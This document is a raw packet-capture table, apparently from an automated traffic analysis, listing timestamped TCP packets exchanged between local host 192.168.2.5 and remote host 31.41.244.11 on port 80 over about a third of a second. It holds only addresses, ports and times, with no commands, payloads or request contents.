Dec 10, 2024 11:11:10.370661974 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.371783018 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.371829033 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.371859074 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.371912003 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.373142004 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.373189926 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.373270035 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.373312950 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.374526024 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.374569893 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.374604940 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.374655962 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.375868082 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.375914097 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.375977993 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.376024008 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.377234936 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.377279043 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.377314091 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.377357960 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.378580093 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.378706932 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.378729105 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.378774881 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.379890919 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.379950047 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.380036116 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.380079985 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.381275892 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.381330013 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.381360054 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.381405115 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.382612944 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.382668972 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.382725000 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.382769108 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.383975029 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.384020090 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.384054899 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.384100914 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.385504007 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.385548115 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.385551929 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.385596037 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.386698008 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.386743069 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.386778116 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.386821985 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.387999058 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.388048887 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.388113022 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.388159037 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.389389038 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.389436960 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.389446020 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.389492035 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.390834093 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.390885115 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.390949011 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.390993118 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.392056942 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.392097950 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.392167091 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.392210007 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.393413067 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.393477917 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.393508911 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.393558025 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.394768000 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.394826889 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.394891977 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.394932985 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.396116018 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.396172047 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.396193981 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.396234035 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.397484064 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.397526979 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.397598028 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.397636890 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.398840904 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.398899078 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.398963928 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.399004936 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.400192976 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.400247097 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.400285006 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.400329113 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.401582003 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.401633978 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.401654959 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.401695013 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.402878046 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.402923107 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.403006077 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.403048038 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.404261112 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.404314995 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.404382944 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.404423952 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.405581951 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.405632019 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.405683041 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.405739069 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.406919003 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.406965971 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.525794029 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.525816917 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.525866985 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.525888920 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.526108027 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.526150942 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.526253939 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.526294947 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.527157068 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.527201891 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.527363062 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.527401924 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.528268099 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.528306961 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.528369904 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.528408051 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.529337883 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.529376984 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.529489040 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.529526949 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.530438900 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.530481100 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.530580997 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.530618906 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.531572104 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.531644106 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.531672955 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.531714916 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.532605886 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.532670975 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.532706022 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.532748938 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.533787966 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.533852100 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.533905029 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.533952951 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.534874916 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.534924030 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.535001040 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.535042048 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.536043882 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.536082983 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.536097050 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.536115885 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.537055969 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.537106037 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.537167072 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.537208080 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.538170099 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.538219929 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.538299084 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.538341999 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.539263964 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.539320946 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.539350986 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.539397001 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.540343046 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.540472984 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.541429996 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.541536093 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.542543888 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.542655945 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.542742014 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.543713093 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.543759108 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.543766022 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.543802023 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.544825077 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.544882059 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.544895887 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.544938087 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.545878887 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.545898914 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.545921087 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.545948982 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.546962976 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.547013044 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.547075987 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.547116041 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.548084021 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.548136950 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.548156977 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.548198938 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.549190044 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.549232960 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.549282074 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.549324036 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.550390959 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.550440073 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.550446987 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.550487041 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.551389933 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.551433086 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.551513910 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.551552057 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.552499056 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.552556992 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.552611113 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.552654028 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.553575993 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.553626060 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.553648949 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.553690910 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.554837942 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.554878950 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.554910898 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.554955006 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.556011915 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.556057930 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.556106091 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.556149006 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.556991100 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.557049036 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.557049990 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.557085037 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.558064938 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.558113098 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.558130980 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.558175087 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.559099913 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.559144974 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.559197903 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.559245110 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.560197115 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.560245991 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.560305119 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.560353041 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.561307907 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.561351061 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.561417103 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.561459064 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.562450886 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.562504053 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.562531948 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.562572002 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.563566923 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.563618898 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.563723087 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.563770056 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.564608097 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.564655066 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.564714909 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.564763069 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.565709114 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.565752029 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.565788984 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.565833092 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.566862106 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.566909075 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.566941977 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.566977978 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.567961931 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.568011045 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.568144083 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.568192005 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.569083929 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.569127083 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.569128036 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.569173098 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.570168972 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.570216894 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.570259094 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.570305109 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.571242094 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.571289062 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.571360111 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.571408033 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.572316885 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.572361946 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.572419882 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.572464943 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.573473930 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.573519945 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.573549032 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.573595047 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.574529886 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.574574947 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.574646950 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.574692011 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.575650930 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.575696945 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.575731993 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.575778008 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.576754093 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.576798916 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.576879978 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.576927900 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.577822924 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.577871084 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.577924013 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.577969074 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.578964949 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.579014063 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.579082012 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.579129934 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.580041885 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.580091000 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.580183029 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.580228090 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.581150055 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.581197023 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.581268072 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.581315041 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.582256079 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.582308054 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.582387924 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.582433939 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.583374023 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.583447933 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.718827009 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.718975067 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.719010115 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.719032049 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.719279051 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.719329119 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.719402075 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.719449043 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.720387936 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.720438004 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.720523119 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.720571041 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.721504927 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.721549034 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.721584082 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.721632004 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.722615004 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.722661972 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.722728968 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.722774029 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.723699093 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.723747969 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.723808050 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.723855972 CET	49828	80	192.168.2.5	31.41.244.11
